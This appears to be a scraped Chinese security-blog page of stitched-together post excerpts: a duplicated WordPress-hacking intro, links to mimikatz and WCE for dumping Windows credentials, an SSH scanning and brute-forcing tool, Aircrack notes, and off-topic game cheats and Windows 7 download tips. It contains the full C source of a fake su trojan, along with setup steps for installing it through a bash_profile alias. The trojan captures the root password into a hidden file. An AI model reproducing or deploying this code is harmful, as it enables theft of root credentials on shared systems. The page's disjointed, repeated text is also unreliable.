来看看老外的日站思路
原文:http://resources.infosecinstitute.com/hacking-a-wordpress-site 《Targeting and Hacking a WordPress Site》
问题的答案看起来不那么确定,显而易见的是黑掉一个站点有很多种方法。在这篇文章,我们的目标是要给大家展示一下黑客是如何锁定并黑掉一个目标站点的!
让我们来看看目标站点:hack-test.com

先ping下站点所在服务器的IP:
原文:http://resources.infosecinstitute.com/hacking-a-wordpress-site 《Targeting and Hacking a WordPress Site》
问题的答案看起来不那么确定,显而易见的是黑掉一个站点有很多种方法。在这篇文章,我们的目标是要给大家展示一下黑客是如何锁定并黑掉一个目标站点的!
让我们来看看目标站点:hack-test.com

先ping下站点所在服务器的IP:
神器下载地址:
http://blog.gentilkiwi.com/mimikatz
还有一篇用这个神器直接从 lsass.exe 里获取windows处于active状态账号明文密码的文章
http://pentestmonkey.net/blog/mimikatz-tool-to-recover-cleartext-passwords-from-lsass
自己尝试了下用 win2008 r2 x64 来测试
SSHscan.py will allow you to scan a internal network through a SSH with port forwarding enabled. The tool allows to create a port forward in localhost for every open port detected in the internal network range.
This tool is not one that can be used in every engagement but when you have the opportunity and the need it will came handy.
The tool has been included in the edgeSSH kit, where we will include all the scripts related with SSH, at the moment only bruteSSH, a SSH login bruteforcer and scanSSH are included in the kit.
You can download the code here: http//code.google.com/p/edgessh
Command line options: -h: target host -u: username -p: password -l: targets lists to scan -t: threads --remote-host: host to scan --remote-ports: port list to scan --default-ports: scan default ports --all-ports: scan all 65535 ports --keep-tunnels: Forward all open ports
Examples:
scanssh.py -h 192.168.1.55 -u root -p passowrd -t list.txt scanssh.py -h 192.168.1.55 -u root -p password --remote-host 127.0.0.1 --remote-ports 80,443 scanssh.py -h 192.168.1.55 -u root -p password --remote-host 127.0.0.1 --default-ports
[source: http://edge-security.blogspot.com/2011/06/scanning-ports-through-ssh-port.html]
来自:http://www.007hack.com/?p=635
Web目录下有一些文件不允许匿名访问(可以使用Tomcat、Apache、nginx等进行配制,来实现此效果),如下图:
可以使用以下代码+字典破解,运行结果如下:
主要代码如下(附件中有完整代码,仅供学习!请勿非法使用!):
点击下载:Crack_pass.rar
/*
/*
* kpr-fakesu.c V0.9beta167
* by koper
*
* Setting up:
* admin@host:~$ gcc -o .su fakesu.c; rm -rf fakesu.c
* admin@host:~$ mv .su /var/tmp/.su
* admin@host:~$ cp .bash_profile .wgetrc
* admin@host:~$ echo "alias su=/var/tmp/.su">>.bash_profile
* admin@host:~$ logout
* *** LOGIN ***
* admin@host:~$ su
* Password:
* su: Authentication failure
* Sorry.
* admin@host:~$ su
* Password:
* root@host:~# logout
* admin@host:~$ cat /var/tmp/.pwds
* root:dupcia17
* admin@host:~$
*
* /bin/su sends various failure information depending on the OS ver.
* Please modify the source to make it "fit" <img src="http://www.4shell.org/wp-content/uploads/images/2011/11/1323384Sm.gif" alt=";)">
*
*/
#include
#include
#include
main(int argc, char *argv[]){
FILE *fp;
char *user;
char *pass;
char filex[100];
char clean[100];
sprintf(filex,"/var/tmp/.pwds");
sprintf(clean,"rm -rf /var/tmp/.su;mv -f /home/test/.wgetrc /home/test/.bash_profile");
if(argc==1) user="root";
if(argc==2) user=argv[1];
if(argc>2){
if(strcmp(argv[1], "-l")==0)
user=argv[2];
else user=argv[1];}
fprintf(stdout,"assword: ");
pass=getpass ("");
system("sleep 3");
fprintf(stdout,"su: Authentication failurenSorry.n");
if ((fp=fopen(filex,"w")) != NULL)
{
fprintf(fp, "%s:%sn", user, pass);
fclose(fp);
}
system(clean);
system("rm -rf /var/tmp/.su; ln -s /bin/su /var/tmp/.su");
}
以下三个都是比较经典的backdoor:
allinone: Linux pentest tools from HUC China
A great app level backdoor in Linux . Very useful while doing Linux pentest.
Written by Lion [HUC(Hack Union of China)] at year 2002
The source code has some errors in packetstromsecurity’s archive; Now all fixed by akshell(http://www.linuxpentest.com)
阅读全文...
Win7下的战争机器不能用修改器和作弊器,XP下却可以正常使用
解决办法:
在\My Documents\My Games\Gears of War for Windows\Binaries里面生成一个文本文件,比如cheat.txt,把你想开的作弊码写进去,比如下面那样
set WarfareGame.Pawn_COGMarcus DefaultHealth 99999
set warfaregame.Weap_locustpistol MaxSpareAmmo 9999
set warfaregame.Weap_locustpistol Magsize 5000
set warfaregame.Weap_cogpistol MaxSpareAmmo 9999
set warfaregame.Weap_cogpistol Magsize 5000
set warfaregame.Weap_locustassaultrifle MaxSpareAmmo 9999
set warfaregame.Weap_locustassaultrifle MagSize 5000
set WarfareGame.Weap_AssaultRifle MaxSpareAmmo 9999
set WarfareGame.Weap_AssaultRifle MagSize 1000
set WarfareGame.Weap_Grenade MaxSpareAmmo 9999
set WarfareGame.Weap_Grenade MagSize 9000
set WarfareGame.Weap_SniperRifle MaxSpareAmmo 9999
set WarfareGame.Weap_SniperRifle MagSize 5000
set WarfareGameContentWeapons.Weap_Bow MaxSpareAmmo 9999
set WarfareGameContentWeapons.Weap_Bow MagSize 5000
set WarfareGameContentWeapons.Weap_Boomer MaxSpareAmmo 9999
set WarfareGameContentWeapons.Weap_Boomer MagSize 9000
set WarfareGame.Weap_Shotgun MaxSpareAmmo 9999
set WarfareGame.Weap_Shotgun MagSize 9000
**以下方法同样适用于Windows 7 With SP1
5分钟的确能下完Window7,但有个前提条件,已经存在有一个相同语言且非企业版、非vl版的Windows7。如果还没有下载过任何版本的Windows7,以下方法并不适用,建议你先下载Ultimate版,速度最快。
例如:
拥有Ultimate_x86、starter_x86、professional_x86、home_premium_x86、homebasic_x86中任意一个版本的windows 7就可以得到剩余4个版本中的任意一个版本windows 7。
拥有Ultimate_x64、professional_x64、home_premium_x64中任意一个版本的windows 7就可以得到剩余2个版本中的任意一个版本windows 7。
(理论上还存在有一个homebasic_x64,但不知是什么原因,微软并未发布。)
以下是使用Xtreme获取的方法:
这里是不是原版?
答: MSDN,OEM以及零售版都是原版,我可以负责任的告诉你,这里提供的MSDN都是原汁原味的原版系统,具体来讲,本贴下载链接或种子来源有三种:
1. 微软官方网站。
2. MSDN I Tell You(众所周知的可靠原版来源)。
3. 海盗湾,景友或本人 (这一类资源均经过景友或本人验证为原版,无一例外)。
请大家放心下载,这里的种子和链接是没有问题的。
5分钟就能下完Window7?
答: 是的,但有个前提条件,就是本地已经存在一个相同语言且非企业版、非vol版的Windows7。具体方法见http://msdn.itellyou.cn/help.htm#express-download (该方法由景友romanyu推荐,特此感谢)
下载有问题?
1.版本不符
2.99.9%停止下载,方法1-先按一下暂停然后重新开始;方法2-关闭下载软件,将文件拷到其他地址,去掉后缀;方法3-一直等待,总会下完的。方法4-Google或百度。
阅读全文...
10月12日Pass-The-Hash toolkit的作者在mailist发布了新版的Pass The Hash Attack tool -- Windows Credentials Editor,简称wce。
单个文件集成了列举、添加、更改credentials的功能,再也不用拖着几个exe和dll文件到处跑了,而且体积仅仅137KB,内网渗透手必备工具.
Windows Credentials Editor v1.0 Supports Windows XP, 2003, Vista, 7 and 2008 (Vista was not actually tested yet, but it should work). Windows Credentials Editor (WCE) allows to list logon sessions and add, change, list and delete associated credentials (ex.: LM/NT hashes). This can be used, for example, to perform pass-the-hash on Windows and also obtain NT/LM hashes from memory (from interactive logons, services, remote desktop connections, etc.) which can be used in further attacks. You can find it here: http://www.ampliasecurity.com/research/wce_v1.0.tgz
//--------------------------------------------------------------------
// AirCrack中文手册 1.0
// 翻译:GaA.Ra(zhoufan#yahoo.cn)
// 随意转载,但请保留此部分信息,谢谢
//--------------------------------------------------------------------
/************************************************************
1.AirCrack-ng
Aircrack is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, thus making the attack much faster compared to other WEP cracking tools. In fact, aircrack is a set of tools for auditing wireless networks.
Aircrack是一个802.11协议WEP和WPA-PSK密钥P解程序,能够恢复出密钥当抓取了足够的数据包的时候.它执行标准FMS攻击并提供一些优化(算法)像Korek攻击,因此相比其他WEPP解工具能够更加快的进行攻击.事实上,Aircrack是一系列的工具用以审计无线网络.
Aircrack-ng 1.0 r1645 - (C) 2006, 2007, 2008, 2009 Thomas d'Otreppe
Original work: Christophe Devine
http://www.aircrack-ng.org
usage: aircrack-ng [options] < .cap / .ivs file(s)>
使用方法: aircrack-ng [选项] < .cap 或 .ivs文件>
Common options: //命令选项
-a
-e
-b
-p
-q : enable quiet mode (no status output) //开启安静模式(不输出状态)
-C
-l
阅读全文...
近期评论